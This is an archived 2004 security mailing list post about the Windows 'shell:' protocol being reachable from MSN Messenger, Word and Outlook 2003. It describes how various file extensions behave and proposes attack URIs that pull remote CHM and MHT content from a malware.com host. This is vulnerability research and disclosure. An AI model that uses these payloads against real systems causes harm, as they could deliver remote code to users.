| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200407111617.i6BGHTjK013733@web185.megawebservers.com> From: 1 at malware.com (http-equiv@...ite.com) Subject: MSN Messenger is vulnerable to the shell: hole <!-- Ctrl+clicking a shell:windows\\notepad.exe link in Microsoft Word 10.2627.3311 launches Notepad. --> this can be very interesting. The same in Outlook 2003 both html and rich text. Good thing the named temp file deposits were magically patched. As Andreas Sandblad mentioned the other day the assigned application will open depending on the file extension. In Outlook 2003 shell:foo.hta will open an empty Html Application window shell: foo.chm will run hh.exe with an error shell: foo.js will run Windows Scripting Host with an error showing the full path where it is looking to run foo.js shell: foo.eml completely screws up Outlook Express with a series of errors the idea then would be to run directly through the non-existent file it is trying to open e.g: shell:foo.chm::http://www.malware.com//bad.chm::/foo.html or shell:C:foo.mht!http://www.malware.com//bad.chm::/foo.html either that, or get something into shell:foo.hta or try to resurrect the named file in the temp. Lot of possibilities including embeddeding the file directly into the mail message and linking to it. All needs to be thoroughly examined though. Which would be unfortunate for the peculiar completely clueless few who think that you just "flick" a switch and the fireworks begin. -- http://www.malware.com
Powered by blists - more mailing lists